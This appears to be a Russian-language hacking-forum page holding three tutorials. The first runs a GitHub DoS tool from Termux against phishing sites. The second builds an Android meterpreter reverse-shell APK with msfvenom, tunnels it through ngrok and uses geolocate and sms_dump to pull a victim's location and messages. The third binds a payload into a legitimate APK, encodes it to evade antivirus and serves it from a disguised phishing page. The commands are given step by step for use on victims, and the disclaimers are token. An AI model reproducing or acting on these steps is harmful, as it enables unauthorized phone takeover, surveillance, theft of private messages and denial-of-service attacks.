Search the Community

Приветствую, хакеры! После появления термукс, участились попытки "взлома" через фишинг сайт, так как почти все туторы написаны с участием сервера ngrok, данную утилиту написали под ДОС ngrok. DoS-атака (Denial of Service) — буквально «отказ в обслуживании». Это тип атаки, в котором мошенники нападают с целью вызвать перегрузку подсистемы сервиса. Ngrok - это мультиплатформенное программное обеспечение для туннелирования, обратного прокси-сервера, которое устанавливает безопасные туннели от общедоступной конечной точки, такой как Интернет, к локально работающей сетевой службе, захватывая весь трафик для детальной проверки и воспроизведения. Установка: Обновляем термукс: apt upgrade && apt update Скачиваем гит: pkg install git Качаем репозиторий: git clone https://github.com/lamer112311/Doser Перемещаемся в директорию: cd Doser Запускаем установку: bash install.sh Запускаем саму утилиту: python doser.py Теперь необходимо ввести ссылку на фишинг сайт жертвы, и ввести количество потоков, где советую указывать от 700-900. И при успешно выполненной работе скрипта, будет такой результат: И я вас поздравляю, вы только что положили фишинг сайт(как бы странно это не звучало) Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

Привет, хакеры, в данной статье поговорим о ngrok и metasploit и способы взлома телефона и получения удаленного доступа к смартфону, используя эти программы. Первым делом переходим на официальный сайт ngrok и создаем аккаунт. Скачивает и устанавливаем инструмент. Ссылка - https://ngrok.com/download Перемещаем иконку запуска на рабочий стол для удобства, запускаем и прописываем следующую строчку: ngrok-stable-linux-amd64.zip После прописываем: ./ngrok authtoken В терминале пишем: ./ngrok tcp 4444 Не забывайте, если вы имеете белый адрес, то данные пункты можно пропустить и даже не использовать Ngrok. Следующим этапом является полноценное создание Payload’а для смартфона. Чтобы создать его будем использовать msfvenom, поэтому используя новую консоль прописываем в ней: msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10612 R > payload.apk Если ngrok вы не использовали, то поле LHOST прописываешь собственный ип-адрес, а в LPORT прописываем 4444. Отлично, payload подготовлен, теперь необходимо передать его нашей жертве. Далее необходимо узнать ip-адрес, используя Kali Linux пишем – “ipconfig”, если у вас установлен Arch, то прописываем “ip a”. Теперь атаку будет производить metasploit, если используете кали, то установке не требуется, он предустановлен. Для запуска прописываем в консоле: msfconsole. И пишем: msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST localhost set LPORT 4444 exploit Когда жертва откроет payload мы сразу же увидим открытую сессию. С этого момента получаем удаленный доступ к телефону жертвы. Для нахождения местоположения необходимо написать: geolocate Также можно скопировать все смс-сообщения при помощи команды: sms_dump Используя подобную незамысловатую схему, вы можете легко получать доступ к чужим смартфонами и работать с инструментами, чтобы использовать полученную информацию. Я никого ни к чему не призываю, статья написана в ознакомительных целях!

Всем привет, сейчас расскажу вам о том, как с помощью apk-файла мы сможем получить доступ к устройству. Первым делом вам нужно скачать любой APK-файл, главное чтобы он весел менее 5 мегабайт, поэтому идем на такой сайт как 4PDA и находим какую-нибудь программу, лично я возьму программу, которая позволят скачивать музыку из соц. сетей. После выполнения данного пункта нам нужно перейти в терминал и прописать все это: -x – использование определенного файла -p – прикрепить payload -o – как-то назвать файл -e – зашифрока файла от антивируса -I – указания кол-ва слоев шифрования Нажимаем Ентер и ожидаем, либо у нас появится ошибка, либо файл будет скомпилирован. Если все-таки появилась ошибка, то нам необходимо обновить APKtool. Если и это не смогло вам помочь, то ищем другой apk-файл, который будете использовать для заражения. Теперь нам нужно использовать фишинг и навыки социальной инженерии для того, чтобы создать простую страницу для зараженной программы. Для создания страницы можно использовать различные конфигураторы сайтов, либо делать это по какому-то исходнику, его я прикрепляю. Не забывайте, что если будете использовать какой-либо конфигуратор, он добавит вам кучу не нужного мусора и хлама. Исходник - https://bit.ly/2k3hKP2 Пароль – social_engineering Помещаем зараженный APK-файл в папку Social, по адресу /var/www/html/ Если картинка не отображается, то вам нужно дать доступ юзеру для чтения и записи в www. Теперь нам необходимо открыть index.html с помощью любого редактора текста и поменять все необходимые вам надписи. После запуска нам нужно открыть бразуер и ввести там свой IP-адрес. Что ваш айпишник стал выглядеть как ссылка для сайта, вам нужно будет установить кое-какую программу, ее найти можно на GitHub, называется она – Cuteit Все расписывать я не буду, в программе есть руководство, которого будет достаточно для нашей задачи. Берем понравившуюся ссылку, копирую ее и вставляем в браузер. Вуаля, мы попали на собственный сервер. Однако в строке сразу же палится ваш IP-адрес, его мы уберем с помощью Ngrok. Скачиваем его, после чего проходим регистрацию и выполняем все действия из руководства, главное быть точным, иначе ничего не сработает. Когда вы закончить все это дело, нам нужно перейти в папку с этой программой, открыть терминал и вписать: Вот мы и получили ссылки, на этом все.